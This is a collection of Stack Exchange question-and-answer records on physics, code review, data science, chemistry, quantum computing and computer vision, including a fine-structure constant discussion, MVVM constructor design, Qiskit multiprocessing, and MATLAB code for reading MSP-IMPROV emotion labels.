looses only 1% of their energy per shift, or 0.01%. Or what ever number which makes them different from a Perpetual mobile. After doing this I encourage you to look more details. If interest; contact me and I send you few hints to start with. The smallest detail can cause the turn even of the greatest mainstream.
{ "domain": "physics.stackexchange", "id": 23082, "tags": "energy, energy-conservation, relativity, tidal-effect, perpetual-motion" }
The expression of the fine-structure constant post-May 2019
Question: Those of us who are engineers were never fond of the common expression from physicists that $$ \alpha = \frac{e^2}{\hbar c} $$ implying that the units of the elementary charge are in "$\sqrt{hc}$". Those of us that are a little more anal (can't spell "analysis" without "anal") about dimension of physical "stuff" and units know that the complete expression for the fine-structure constant is $$ \alpha = \frac{e^2}{(4 \pi \varepsilon_0) \hbar c} $$ but the seasoned physicists are thinking in terms of electrostatic cgs units where the unit of charge is defined so that the Coulomb constant $k_\mathrm{e} = \frac{1}{4 \pi \varepsilon_0}$ is set to dimensionless 1. That seemed okay before May 20, 2019 when all of the "variables" in $\varepsilon_0 = \frac{1}{c^2 \mu_0}$ were defined constants and it didn't seem to be a whoop to use a different definition of a dimensionful constant $\varepsilon_0$. But now $\varepsilon_0$ is a measured universal constant that is expressed with an error specification and is derived from $\alpha$ anyway. Are these HEP physicists gonna continue saying $\alpha = \frac{e^2}{\hbar c}$ or will they have to be more proper with their use of "constants" and dimensionality? Will they continue to say that the units of the elementary charge are "$\sqrt{hc}$"? Answer: My prediction is that the 2019 metrological redefinitions will have absolutely no impact on how theoretical physicists use natural units. They will continue to think of $\hbar$ and $c$ as $1$, and of $e$ and $\alpha$ as dimensionless, and there will be nothing improper about doing so. Most will continue to think of SI units as a bizarre historical monstrosity.
{ "domain": "physics.stackexchange", "id": 59285, "tags": "physical-constants, absolute-units" }
ViewModel constructor with many parameters
Question: I have some ViewModels that have a lot of parameters like this one: public class ProductsMainViewModel : NotificationObject, IActiveAware, ... { public ProductsMainViewModel(IProductRepository productRepository, IWarehouseRepository warehouseRepository, IUnitOfMeasureRepository unitOfMeasureRepository, IProductCategoryRepository productCategoryRepository, IProductPriceRepository productPriceRepository, IPriceLevelRepository priceLevelRepository, ICodingRepository codingRepository, ICategoryRepository categoryRepository, IDialogService dialogService, Logging.ILoggerFacade logger, IRegionManager regionManager, IJsonSerializer jsonSerializer, ICodeService codeService, IEventAggregator eventAggregator) { // ... } } (All repositories have the same instance of IUnitOfWork) Instantiating this is done by IUnityContainer, But there are some dialogs that get called in this ViewModel: var viewModel = new ProductViewModel(_warehouseRepository, _unitOfMeasureRepository, _productCategoryRepository, _priceLevelRepository, _productPriceRepository, _codingRepository, _dialogService, _codeService, _jsonSerializer); var result = _dialogService.ShowDialog("ProductWindow", viewModel); if (result == true) { // ... } that their repositories must have the same IUnitOfWork of the current ViewModel. So I decided to pass parameters manually. I found it a good idea to "not reference any IoC container" in my ViewModel in here. The benefit of this approach is that the ViewModel doesn't have any knowledge of the (Unity) container. Also, in terms of understanding the application design the dependencies of the ViewModel are easy to see since they are in the constructor. Well, any ideas on how to reduce the number of parameters? Any particular design pattern? Is it a good idea to create a 'IFooRepositoriesContext' and put related repositories in it? Answer: I agree with what Jesse said in that a grouping of your repositories into one related is one approach and may be the one best suited in your case. However I'd like to offer another approach and that would be use composition in your ViewModel and have it contain lots of smaller ViewModels. Also, in terms of understanding the application design the dependencies of the ViewModel are easy to see since they are in the constructor I don't think that splitting the ViewModels up into smaller ones will break this statement . However I also don't necessarily agree with it either. Why should the ViewModel depend on anything? However what I do think splitting your ViewModels up (where possible of course) is allow you to potentially re-use any Viewmodel while also making each view model specific to a particular part of the design/functional requirement. So if I was to continue on with the IFooRepositoriesContext approach I might consider something like this: public ProductViewModel { public string ProductOnlyDetail { get; set; } public ProductDescriptionViewModel Description { get; set; } public ProductPriceViewModel Price { get; set; } } or if you wanted to make it explict that the ProductViewModel always needs parameters then create the constructor to take the IFooRepositoriesContext: public ProductViewModel(IFooRepositoriesContext context) { // and build your viewModel there } Your sub viewmodels themselves might look like (examples only of course): public ProductDescriptionViewModel { public ProductDescriptionViewModel(IProductRepository productRepository, IWarehouseRepository warehouseRepository, IUnitOfMeasureRepository unitOfMeasureRepository, IProductCategoryRepository productCategoryRepository) { } public string Name { get; set; } // etc } public ProductPriceViewModel { public decimal Price { get; set; } public string Currency { get; set; } // etc public ProductPriceViewModel (IProductPriceRepository productPriceRepository, IPriceLevelRepository priceLevelRepository) { } } Then your code might be sonething like: var viewModel = new ProductViewModel { Description = new ProductDescriptionViewModel(productRepository, warehouseRepository, unitOfMeasureRepository, productCategoryRepository), Price = new ProductPriceViewModel(productPriceRepository, priceLevelRepository) ProductOnlyDetail = "Hello" } var result = _dialogService.ShowDialog("ProductWindow", viewModel); if (result == true) { // ... } But there are some dialogs that get called in this ViewModel I assume this was a grammatical error and you don't actually call dialogs from within the viewModel itself? If so I seriously think you should reconsider your approach to using the ViewModels. ViewModelBuilder or someother approach. Aside from this I would consider having another object that was responsible for building up your viewmodels. Of course it depends on the design and requirements of the system but I would be asking. Will the viewmodel always get the data from x? Is there any reason why it couldn't get it from y? If yes then having the viewModel build itself is really limiting it to the knowledge of where and what data to obtain, even if the where of that data is abstracted out view interfaces. There are existing mapping frameworks out there already that may offer assistance if you were worried about the class explosion this might cause? Hope this helps give a different perspective or some more food for thought :)
{ "domain": "codereview.stackexchange", "id": 2457, "tags": "c#, mvvm" }
Calculating confidence interval for model accuracy in a multi-class classification problem
Question: In the book Applied Predictive Modeling by Max Kuhn and Kjell Johnson, there is an exercise concerning the calculation of a confidence interval for model accuracy. It reads as follows. One method for understanding the uncertainty of a test set is to use a confidence interval. To obtain a confidence interval for the overall accuracy, the based R function binom.test can be used. It requires the user to input the number of samples and the number correctly classified to calculate the interval. For example, suppose a test set sample of 20 oil samples was set aside and 76 were used for model training. For this test set size and a model that is about 80% accurate (16 out of 20 correct), the confidence interval would be computed using > binom.test(16, 20) Exact binomial test data: 16 and 20 number of successes = 16, number of trials = 20, p-value = 0.01182 alternative hypothesis: true probability of success is not equal to 0.5 95 percent confidence interval: 0.563386 0.942666 sample estimates: probability of success 0.8 In this case, the width of the 95% confidence interval is 37.9%. Try different samples sizes and accuracy rates to understand the trade-off between the uncertainty in the results, the model performance, and the test set size. The dataset used here contains samples belonging to 7 classes. Since this is a multiclassification problem, not a binary one, shouldn't the probability of success in the null hypothesis be equal to 1/7? Is there a reason why the authors have chosen 1/2 as the probability of success? Answer: The author uses binom.test - The binomial test is used when an experiment has two possible outcomes and you have an idea about what the probability of success is and similar to other statistical test, you measure if the success in observed set is significantly different from what was expected. From now it is getting more complicated : the author is trying to calculate To obtain a confidence interval for **the overall accuracy**. Therefore, the test is not the accuracy per group (each seven oil type) but rather the whole model: whether it predicts correctly or not. So you are dealing with a binary output: success vs fail and you calculate the confidence interval of that. So I assume if you play with the data and make various model with different data size (more/less than 76 data points), you will see using more data leads to a narrower confidence interval. How confidence interval is important when it comes to predictive analysis, is another question which I encourage you to ask and follow the sister community https://stats.stackexchange.com/
{ "domain": "datascience.stackexchange", "id": 9654, "tags": "predictive-modeling, multiclass-classification, accuracy, hypothesis-testing" }
How do I visualise bicyclo[4.4.1]undeca-1,3,5,7,9-pentaene?
Question: While reading my organic chem book, I came across this compound: Since this is an exercise question, I do not know the name of this compound. I am unable to visualize this compound (how it looks out of the paper) as I have never come across two rings joined by a bridge-like structure, my book says it is a methylene bridge. I appreciate your assistance in determining the structure of this compound. Answer: This compound is 1,6-methano[10]annulene, and a classic example of an unusual compound displaying aromaticity. Aromaticity requires the pi-system to lie in a plane. One might speculate that [10]annulene (shown below) would be aromatic, because it contains a cyclic pi-system of 10 electrons, which appears to be planar. However, because the hydrogens indicated are trying to occupy the same space, the compound is forced out of planarity, and the compound it non-aromatic. Bianchi and coworkers reported the crystal structure of 1,6-methano[10]annulene. In this compound, the hydrogens that clash in [10]annulene are replaced by a methylene (CH2) group. From directly above, the compound looks basically like naphthalene, with a little extra space in the middle. More interestingly, from the side, it's clear that the atoms of the 10-membered ring are nearly planar, with that methylene bridge oriented perpendicular to the plane. Reference: Structure of 1,6-methano[10]annulene, R. Bianchi, T. Pilati and M. Simonetta, Acta Cryst. (1980). B36, 3146-3148, https://doi.org/10.1107/S0567740880011089
{ "domain": "chemistry.stackexchange", "id": 10582, "tags": "organic-chemistry, molecular-structure, molecules" }
Are there anti virtual particles (mediator bosons)?
Question: I have read these questions: Can bosons have anti-particles? Is there a possibility for discovery of anti-graviton, i.e. the graviton antiparticle? Antiparticle for Higgs boson? According to the accepted theory, the SM, all elementary particles do have their anti party, so do bosons that mediate. The EM force is mediated by virtual photons. Gravity is mediated by theoretical virtual gravitons. The strong force is mediated by virtual gluons. The weak force is mediated by virtual W and Z bosons. All these bosons do have anti version according to the SM, so photons are their own anti particles gravitons too gluons have their anti gluon versions W and Z bosons too have their anti versions Now since these virtual bosons mediate the fundamental forces, are there anti virtual bosons? Question: are there anti virtual bosons? do these mediate the anti forces? Answer: are there anti virtual bosons? As you know, a virtual particle is a mathematical construct and is connected with the real particle of its name by the quantum numbers identifying the particle. Also, you should know that all particles can be virtual within Feynman diagrams if they are not within the incoming and outgoing legs. In these Compton scattering diagrams it is the electron that is virtual, or the positron, when the e represents a positron gamma scattering. So yes, antiparticles can also be mediator virtual particles in an interaction do these mediate the anti forces? There are no antiforces, there are attractive or repulsive end results in the interactions studied and modeled with Feynman diagrams in order to calculate the crosssections or decay rates. The gauge bosons of the four macroscopic forces, identified with the electromagnetic/weak/strong and gravity ( if quantized) are just virtual exchanges in the lowest order diagrams in simple particle-particle interactions. It is only the quantum numbers that they carry, and their mass in the propagator which identify them. The mass is the same for Z+ or Z-, and enters in the propagator, and just the charge characterizes the virtual particle.
{ "domain": "physics.stackexchange", "id": 57572, "tags": "particle-physics, antimatter, interactions, virtual-particles, carrier-particles" }
Parallelizing Qiskit not working
Question: I hope this is the right place to ask this kind of question. I'm using the Aer simulator in Qiskit to analyze the state vector of some circuits. My program is very parallelizable, but when I try to run these qiskit calculations in parallel (using the multiprocessing library in python), in certain situations the call to Qiskit to simulate the circuit hangs indefinitely. For instance, I may have something like this: from multiprocessing import Pool def parallel(circ2): simulator2 = Aer.get_backend('aer_simulator') result2 = simulator.run(circ2).result() print(result2) circ1 = ... #some kind of circuit simulator1 = Aer.get_backend('aer_simulator') result1 = simulator1.run(circ1).result() print(result1) circs_arr = [...] #some list of different circuits with Pool(5) as p: p.map(parallel,circs_arr) The above code does not work. The parallelized call to run the circuit (within the function) hangs indefinitely. However, if I remove the first run of the simulator (that produces result1), then everything is fine and works as expected. Does anyone know how I can fix this? I've read that the problem might have something to do with qiskit Aer utilizing multiprocessing for its own purposes, so using running Aer with multiprocessing can cause a conflict. However, my attempts to turn off qiskit's internal multiprocessing have not worked, or have not fixed my problem. Answer: I took a closer look under the hood of qiskit, and I think I've discovered the issue. It looks like Qiskit uses the concurrent.futures library to do their concurrency/parallelization. There seems to be some kind of a conflict with uses the concurrent library together with the multiprocessing library. I was able to get my code to work by switching from multiprocessing to concurrent.futures to handle my parallelization. The only changes that need to be made for the above code to work are to add import concurrent.futures and replace pool(5) with futures.ThreadPoolExecutor(max_workers=5).
{ "domain": "quantumcomputing.stackexchange", "id": 3244, "tags": "qiskit" }
Measuring in standard basis meaning
Question: What does it mean to measure a qubit (or multiple qubits) in standard basis? Answer: A $1$-qubit system, in general, can be in a state $a|0\rangle+b|1\rangle$ where $|0\rangle$ and $|1\rangle$ are basis vectors of a two dimensional complex vector space. The standard basis for measurement here is $\{|0\rangle,|1\rangle\}$. When you are measuring in this basis, with $\frac{|a|^2}{|a|^2+|b|^2}\times 100\%$ probability you will find that the state after measurement is $|0\rangle$ and with $\frac{|b|^2}{|a|^2+|b|^2}\times 100\%$ you'll find that the state after measurement is $|1\rangle$. But you could carry out the measurement in some other basis too, say $\{\frac{|0\rangle+|1\rangle}{\sqrt{2}},\frac{|0\rangle-|1\rangle}{\sqrt{2}}\}$, but that wouldn't be the standard basis. Exercise: Express $a|0\rangle+b|1\rangle$ in the form $c(\frac{|0\rangle+|1\rangle}{\sqrt{2}})+d(\frac{|0\rangle-|1\rangle}{\sqrt{2}})$ where $a,b,c,d\in\Bbb C$. If you measure in the basis the probability of ending in the state $\frac{|0\rangle+|1\rangle}{\sqrt{2}}$ after a measurement is $\frac{|c|^2}{|c|^2+|d|^2}\times 100\%$ and probability of ending in the state $\frac{|0\rangle-|1\rangle}{\sqrt{2}}$ is $\frac{|d|^2}{|c|^2+|d|^2}\times 100\%$. Similarly, for a $2$-qubit system the standard basis would $\{|00\rangle,|01\rangle,|10\rangle,|11\rangle\}$ and its general state can be expressed as $\alpha|00\rangle + \beta|01\rangle + \gamma|10\rangle + \delta|11\rangle$. When you measure this in the standard basis you can easily see that the probability of ending up in the state (say) $|00\rangle$ will be $\frac{|\alpha|^2}{|\alpha|^2+|\beta|^2+|\gamma|^2+|\delta|^2}\times 100\%$. Similarly you can deduce the probabilities for the other states. You should be able to extrapolate this same logic to general $n$-qubit states, now. Feel free to ask questions in the comments.
{ "domain": "quantumcomputing.stackexchange", "id": 200, "tags": "quantum-state, measurement" }
What is the meaning of hand crafted features in computer vision problems?
Question: Are these the features which are manually labelled by humans? or Is there any technique for obtaining these features. Is this related to learned features? Answer: "Hand Crafted" features refer to properties derived using various algorithms using the information present in the image itself. For example, two simple features that can be extracted from images are edges and corners. A basic edge detector algorithm works by finding areas where the image intensity "suddenly" changes. To understand that we need to remember that a typical image is nothing but a 2D matrix (or multiple matrices or tensor or n-dimensional array, when you have multiple channels like Red, Green, Blue, etc). In the case of an 8-bit gray-scale image (or a "black and white" image, although this latter definition is not quite accurate) the image is typically a 2D matrix with values ranging from 0 to 255, with 0 being completely black and 255 being completely white. Now imagine an image of a blackboard set against a totally white wall. As we move left-to-right in the image the values in one of the rows of the matrix might look like 255-255-255... since we will be "moving" along the wall. However, when we are about to hit the blackboard in the image it might look like 255-255-0-0-0...As you might have guessed, the blackboard "begins" in the image where the zeros start. In other words, the "intensity" of the image along the "x" axis has dropped rather suddenly (or a very large negative gradient along x), which means a typical edge detector will consider it to be a good candidate for an edge. The algorithm that we just saw is only the very basic of algorithms, and others like Harris corners and Hogg detectors use slightly more "sophisticated" algorithms. Actually, even the Canny edge detector does a lot more than I what I just described, but that is besides the point. The point is that once you understand that an image is nothing more than a data matrix, or an n-dimensional array, the other algorithms are not that difficult to understand either. As regards your last question: Is this related to learned features? The "handcrafted features" were commonly used with "traditional" machine learning approaches for object recognition and computer vision like Support Vector Machines, for instance. However, "newer" approaches like convolutional neural networks typically do not have to be supplied with such hand-crafted features, as they are able to "learn" the features from the image data. Or to paraphrase Geoff Hinton, such feature extraction techniques were "what was common in image recognition before the field became silly".
{ "domain": "datascience.stackexchange", "id": 1991, "tags": "machine-learning, feature-selection, computer-vision, feature-engineering, convolutional-neural-network" }
Extract feature area from image
Question: I have an image like the one above, and what I need to find are the red circled areas. They are caused by how the nerve layer is in the eye, and I have no idea what method to use to extract them. (I am looking for a brighter background from the nerve layer) I have found all the blood vessels, so I can ignore those area easily. But I don't have any concept of how to begin the search for these areas. Note that the bright spots on the right top side (lets say 12 o clock / 1 o clock from the image center) are not caused by the nerve layer, but from being in a young persons eye. Can someone point me to a method to extract these areas? Note that the areas could also be non-existant, or be formed like a cross, or like an hourglass. Answer: It is going to be a tough task, and you may not achieve an automated process. Here are some bricks that you could try: Enhance the contrast of the image so that you can clearly distinguish all the features by looking at the image. Here is a link to an algorithm that shows good results. In this enhanced image, extract the edges (using for example a standard Canny-Deriche edge detector). From the edge detector output, you can start adding the required application logic in order to keep the desired vessels: size or length criteria, linear features extraction, etc.
{ "domain": "dsp.stackexchange", "id": 859, "tags": "image-segmentation" }
How do you deal with the "Kidnapped robot problem"
Question: Having a map, and the robot "waking up" at an unknown position, what methods are currently used to recover the position? Originally posted by Mehdi. on ROS Answers with karma: 3339 on 2015-02-15 Post score: 0 Answer: Usually the two main approaches are kalman filter or particle filter. I implemented particle filter in the past and it gives very good results. Hope this helps, Originally posted by marguedas with karma: 3606 on 2015-02-17 This answer was ACCEPTED on the original site Post score: 0
{ "domain": "robotics.stackexchange", "id": 20887, "tags": "ros, mapping, 3d-slam" }
Mathematical calculation behind decision tree classifier with continuous variables
Question: I am working on a binary classification problem having continuous variables (Gene expression Values). My goal is to classify the samples as case or control using gene expression values (from Gene-A, Gene-B and Gene-C) using decision tree classifier. I am using the entropy criteria for node splitting and is implementing the algorithm in python. The classifier is easily able to differentiate the samples. Below is the sample data, sample training set with labels Gene-A Gene-B Gene-C Sample 1 0 38 Case 0 7 374 Case 1 6 572 Case 0 2 538 Control 33 5 860 Control sample testing set labels Gene-A Gene-B Gene-C Sample 1 6 394 Case 13 4 777 Control I have gone through a lot of resources and have learned, how to mathematically calculate Gini-impurity, entropy and information gain. I am not able to comprehend how the actual training and testing work. It would be really helpful if someone can show the calculation for training and testing with my sample datasets or provide an online resource? Answer: Of course, it depends on what algorithm you use. Typically, a top-down algorithm is used. You gather all the training data at the root. The base decision is going to be whatever class you have most of. Now, we see if we can do better. We consider all possible splits. For categorical variables, every value gets its own node. For continuous variables, we can use any possible midpoint between two values (if the values were sorted). For your example, possible splits are Gene-A < 0.5, Gene-A < 17, Gene-B < 1, Gene-B < 3.5, and so on. There is a total of 10 possible splits. For each of those candidate splits, we measure how much the entropy decreases (or whatever criterion we selected) and, if this decrease looks significant enough, we introduce this split. For example. Our entropy in the root node is $-0.4 \log_2 0.4 - 0.6 \log_2 0.6 \approx 0.97$. If we introduce the split Gene-A < 0.5, we get one leaf with entropy $1$ (with 2 data points in it), and one leaf with entropy $0.918$ (with 3 data points). The total decrease of entropy is $0.97 - (\frac25 \times 1 + \frac35 \times 0.918) \approx 0.02$. For the split Gene-A < 17 we get a decrease of entropy of about $0.3219$. The best splits for the root are Gene-B < 5.5 and Gene-C < 456. These both reduce the entropy by about $0.42$, which is a substantial improvement. When you choose a split, you introduce a leaf for the possible outcomes of the test. Here it's just 2 leaves: "yes, the value is smaller than the threshold" or "no, it is not smaller". In every leaf, we collect the training data from the parent that corresponds to this choice. So, if we select Gene-B < 5.5 as our split, the "yes" leaf will contain the first, fourth and fifth data points, and the "no" leaf will contain the other data points. Then we continue, by repeating the process for each of the leaves. In our example, the "yes" branch can still be split further. A good split would be Gene-C < 288, which results in pure leaves (they have 0 entropy). When a leaf is "pure enough" (it has very low entropy) or we don't think we have enough data, or the best split for a leaf is not a significant improvement, or we have reached a maximum depth, you stop the process for that leaf. In this leaf you can store the count for all the classes you have in the training data. If you have to make a prediction for a new data point (from the test set), you start at the root and look at the test (the splitting criterion). For example, for the first test point, we have that Gene-B < 5.5 is false, so we go to the 'no' branch. You continue until you get to a leaf. In a leaf, you would predict whatever class you have most of. If the user wants, you can also output a probability by giving the proportion. For the first test point, we go to the "no" branch of the first test, and we end up in a leaf; our prediction would be "Case". For the second test point, we go to the "yes" branch of the first test. Here we test whether 777 < 288, which is false, so we go to the "no" branch, and end up in a leaf. This leaf contains only "Control" cases, so our prediction would be "Control".
{ "domain": "ai.stackexchange", "id": 2267, "tags": "machine-learning, math, decision-trees" }
Does this point-projection of a mixed state onto a pure state appear in the quantum information theory literature?
Question: In my research, I stumbled on a smooth map: $$\pi_{\rho_0}: B \setminus \{\rho_0\} \to \partial B$$ where $B$ is the open Bloch ball, corresponding to the set of mixed states of a single qubit and $\partial B$ is the Bloch sphere proper, consisting of the set of pured states of a single qubit and $\rho_0 \in B$ is a fixed mixed state of a single qubit. The map is defined as follows. After fixing $\rho_0 \in B$, you define the image of a mixed state $\rho \in B$, $\rho \neq \rho_0$ as the intersection of the ray starting from $\rho_0$ and passing through $\rho$ with $\partial B$ (the Bloch sphere proper). This can be characterized as follows. It is the unique pure state which can be written as a linear combination $$a \rho_0 + b \rho$$ where $a, b \in \mathbb{R}$ such that $a + b = 1$ and $b > 1$ (and therefore $a < 0$). Note that $\pi$ can be viewed as a map $$ B \times B \setminus \Delta \to \partial B $$ mapping $(\rho_0, \rho)$ to $\pi_{\rho_0}(\rho)$, where $\Delta \subset B \times B$ is the diagonal (i.e. $\Delta$ consists of all pairs $(\rho, \rho)$ such that $\rho \in B$). Then if $G = \mathrm{SU}(2)$, then $G$ acts on $B \times B$ by $$ g.(\rho_0, \rho) := (g \rho_0 g^{-1}, g \rho g^{-1}). $$ Moreover, $G$ acts on $\partial B$ by $$ g.\nu = g \nu g^{-1}.$$ Then, if I am not mistaken, $\pi$ is $G$-equivariant. This map $\pi$ seems natural. I know it appears in the literature when $\rho_0 = \frac{1}{2}I$ is at the "origin" of the Bloch ball. But did the more general $\pi_{\rho_0}$, where $\rho_0$ is any fixed mixed state of the qubit, appear in the quantum information theory literature please? I would like to investigate whether there may be a link between a problem in geometry that I am interested in and quantum information theory. Answer: I am not aware of a direct application of this projection. However, maybe the following geometrical construction is nevertheless of interest to you. Similar ray constructions appear in resource theories, namely in the definition of robustness and generalised robustness monotones. Consider a convex set of states $\mathcal{F}$ which we call the free states in the resource theory. Let us denote by $\mathcal{S}$ the convex set of all states. Then, given a state $\rho$ we define the following functions $$ R(\rho) = \inf\big\{ t\geq 0 \; | \; \rho = (1+t)\sigma_0 - t \sigma_1 \text{ for } \sigma_0,\sigma_1\in\mathcal{F} \big\}, $$ $$ GR(\rho) = \inf\big\{ t\geq 0 \; | \; \rho = (1+t)\sigma_0 - t \sigma_1 \text{ for } \sigma_0\in\mathcal{F}, \sigma_1\in\mathcal{S} \big\}. $$ In the definitions, we optimise over all rays going through $\mathcal{F}$ which include $\rho$. If $\rho$ is pure, than $\rho$ is the projection of $\sigma_1$ w.r.t to $\sigma_0$ under your map. The monotones have the following geometrical interpretation: For $R$: $\sigma_0$ is the closest state in $\mathcal{F}$ to $\rho$ measured w.r.t. to the length of the ray segment which lies in $\mathcal{F}$ (the diameter of $\mathcal{F}$ in this direction) For $GR$: similar, but compared to the distance of $\sigma_0$ to the opposite boundary of $\mathcal{S}$. The generalised robustness is equivalent to what is called the max-relative entropy $$ \mathcal{D}_\mathrm{max}(\rho) := \inf_{\sigma\in\mathcal{F}} D_\mathrm{max}(\rho||\sigma) = \log\left( 1 + GR(\rho) \right) $$ where $D_\mathrm{max}(\rho||\sigma)=\log \inf\{\lambda\geq 0 \, | \, \rho \leq \lambda\sigma\}$. After your remark, I changed $\min$ to $\inf$. However, $\mathcal{F}$ is usually compact. Here is a review on resource theories which appeared recently in RMP. The above functions and more appear in Sec. VI. Chitambar and Goul: "Quantum Resource Theories". https://arxiv.org/abs/1806.06107
{ "domain": "quantumcomputing.stackexchange", "id": 2210, "tags": "quantum-state, bloch-sphere" }
how to read emotion label of MSP-IMPROV dataset samples?
Question: I need to read MSP-IMPROV dataset audio file's to conduct research. I read the help file that says 15th character of the file name, shows the emotion label of each utterance. For example: MSP-IMPROV-S01A-M01-P-FM01 intended Angry emotion. But when I run the code that follows this rule, I can't reach the other emotions that are labeled O as others and WA as without agreement. Moreover, I must extract Anger (792) Happiness (2644) Sadness (885) Neutral (3477) But I find out the number of each emotion is Anger (2511) Happiness (2267) Sadness (2035) Neutral (1625) Can anyone help me to find out where I made a mistake? Thanks in advance. *for more information about this database, you can find it in this link and this page Answer: I asked this question from Prof. Busso as the leader of the MSP-Improv dataset team. He answered: " The intended emotion is included in the file name. The emotion annotated by the workers is provided in the file Evalution.txt. You should not use the intended emotion as the actual emotion. Example: MSP-IMPROV-S01A-M01-P-FM01 intended emotion was anger, but if you see the evaluation you will see the following information: UTD-IMPROV-S01A-M01-P-FM01.avi; N; A:3.666667; V:3.166667; D:2.833333 ; N:4.166667; 51o11nal985p2oq49qmnnqivm2-p3b; Neutral; Neutral; A:3.000000; V:3.000000; D:4.000000; N:4.000000; 6lrk33e18tetg934je64ale7r6-p3b; Neutral; Neutral; A:4.000000; V:3.000000; D:3.000000; N:4.000000; cv970rs8rn8v23p3f3tec5bgb4-p3b; Happy; Happy,Neutral; A:5.000000; V:4.000000; D:3.000000; N:5.000000; n76ifqflrdaao10o0bg8js05o3-p3b; Neutral; Neutral; A:3.000000; V:3.000000; D:2.000000; N:4.000000; puumgduqdt8hfiffuvts8m3241-p3b; Neutral; Neutral; A:4.000000; V:3.000000; D:2.000000; N:4.000000; qlvg8teulu3c7mcgvds07eqte1-p3b; Neutral; Neutral; A:3.000000; V:3.000000; D:3.000000; N:4.000000; This file was annotated as neutral. " so I write a code for this purpose that reads the file name and finds it in the Evaluation file and read real annotated emotion. this is the main function (please put MSP database in "DBs" folder): function [DB, samplesN, fs]= mspDBread(sesNum) %% emoEvl = 'DBs/MSPEvalution.txt'; rootdir = 'DBs/MSP-IMPROV'; sesList = dir(rootdir); sesList = sesList(3:end); samplesN =1; for iSes= sesNum session = sesList(iSes).name; sentenceRoot = [rootdir,'/',session]; sentences = dir(sentenceRoot); sentences = sentences(3:end); for iSentence = 1:numel(sentences) scenarioRoot=[sentenceRoot,'/',sentences(iSentence).name]; SentName = sentences(iSentence).name; scenario = dir(scenarioRoot); scenario = scenario(3:end); for iScen = 1:numel(scenario) fileRoot = [scenarioRoot,'/',scenario(iScen).name]; fileList = dir(fileRoot); fileList = fileList(3:end); for iFile = 1:numel(fileList) emoList={}; i=1; textFileID = fopen(emoEvl); tline = fgetl(textFileID); while ischar(tline) tline = fgetl(textFileID); if numel(tline)~=0 if strcmp(tline(1),'U') words = strsplit(tline); destLineHeader = words(1); destLineHeader = destLineHeader{1,1}; destLineHeader = destLineHeader(5:end-5); waveFileName = fileList(iFile).name; if strcmp(destLineHeader,waveFileName(5:end-4)) emotion = words(2); emotion = emotion{1,1}; emotion = emotion(1,1); compRoot= [fileRoot,'/',waveFileName]; [x, fs] = audioread(compRoot); DB{samplesN,1} = samplesN; % sample Number DB{samplesN,2} = str2double(session(end)); % session number DB{samplesN,3} = str2double(waveFileName(13:14)); % scentence number DB{samplesN,4} = scenarioMap(waveFileName(21)); % scenario type DB{samplesN,5} = labelMap(emotion); % emoton label DB{samplesN,6} = genderMAP(waveFileName(17)); % speaker gender DB{samplesN,7} = str2double( waveFileName(18:19)); % speaker ID DB{samplesN,8} = genderMAP( waveFileName(23)); % listener gender 1:male 0:female DB{samplesN,9} = genderMAP( waveFileName(24)); % seaker gender 1:male 0:female DB{samplesN,10} = str2double(waveFileName(25:26)); % turn number DB{samplesN,11} = waveFileName; % complete name of voice DB{samplesN,12} = x; % data disp ([num2str(samplesN), ' session : ',session(end), ' label:',waveFileName(15),' detect: ',emotion,' EmoIndex: ',num2str(labelMap(emotion)),' ', waveFileName]) samplesN =samplesN+1; end end end end fclose('all') ; end end end end other functions that are used in the above function is listed below: 1- scenario mapping function: function [code]=scenarioMap(character) if character=='T' code = 0; elseif character=='S' code = 1; elseif character=='P' code = 2; elseif character=='R' code = 3; else code = 4; end 2- label mapping function: function [code]= labelMap(character) if character=='A' code = 0; elseif character=='H' code = 1; elseif character=='S' code = 2; elseif character=='N' code = 3; elseif character=='O' code = 4; disp('--------zzzzzzz-----') elseif character=='W' code = 4; disp('--------zzzzzzz-----') else code = 4; end 3-Gender mapping function: function [gender ]= genderMAP(str) if strcmp(str,'F') gender = 0; elseif strcmp(str,'M') gender = 1; end
{ "domain": "datascience.stackexchange", "id": 7719, "tags": "python, deep-learning, matlab" }
understanding linear algebra of a forget gate
Question: This blog covers the basics of LSTMs. A forget gate is defined as : $$f_t = \sigma(W_f \cdot [h_{t-1}, x_t]+ b_f)$$ At this point the linear algebra confuses me more than it should. The syntax of $W\cdot [h,x]$ is confusing in this context. I think a vector should go into the activation function since the output $f$ is a vector, but the syntax of the forget gate above implies that the input has $2$ columns because $[h,x]$ will be an $n\times 2$ matrix For the sake of example lets say ... \begin{align} W &= \begin{bmatrix} 0 & 1 \\ 2 &3 \end{bmatrix}\\ h &= \begin{bmatrix} -1 \\ 2 \end{bmatrix}\\ x &= \begin{bmatrix} 3 \\ 0 \end{bmatrix}\\ b &= \begin{bmatrix} 1 \\ -2 \end{bmatrix}\end{align} Can anyone give the final vector that goes into the sigmoid function ? I think the math is $$ \begin{bmatrix} 0 & 1 \\ 2 & 3 \end{bmatrix}\begin{bmatrix} -3 & 3 \\ 2 & 0 \end{bmatrix} + \begin{bmatrix} 1 \\ -2\end{bmatrix} = \begin{bmatrix} 2 & 0 \\ 4 & 6\end{bmatrix}+ \begin{bmatrix} 1 \\ -2\end{bmatrix} = \text{ Something wrong}$$ Answer: Note that $$[h_{t-1}, x_t]$$ is the concatenation of two vectors. In your example, it would be: $$[h_{t-1}, x_t] = [-1, 2 , 3, 0]$$ and then the dimensions of $W_f$ would be $2 \times 4$, where $2$ is the dimension of the output of the LSTM cell, i.e. the activation $h_t$, that you defined to be of dimension $2$. Hence, $$W_f \cdot [h_{t-1}, x_t] $$ is a multiplication of a matrix of dimension $2\times4$ by a vector of $4$, which will return a vector of dimesion $2$. And then the sigmoid function will be applied point wise on each of the two elements of the result. Hope it makes sense.
{ "domain": "datascience.stackexchange", "id": 4761, "tags": "neural-network, lstm, rnn" }
How to calculate the moment of inertia of a 2 point mass system
Question: I have 2 point masses $m_1$ and $m_2$ connected via a massless rigid rod to a center. $m_1$ is at the distance $r_1$ from the center and $m_2$ is at the distance $r_2$ from the center. How would i calculate the moment of inertia of the system? Answer: It is the sum of the point mass moments of inertia $$I=\sum_i m_ir_i^2 =m_1r_1^2+m_2r_2^2+...$$
{ "domain": "physics.stackexchange", "id": 27753, "tags": "homework-and-exercises, moment-of-inertia" }
Obtaining a recurrence from a rational generating function
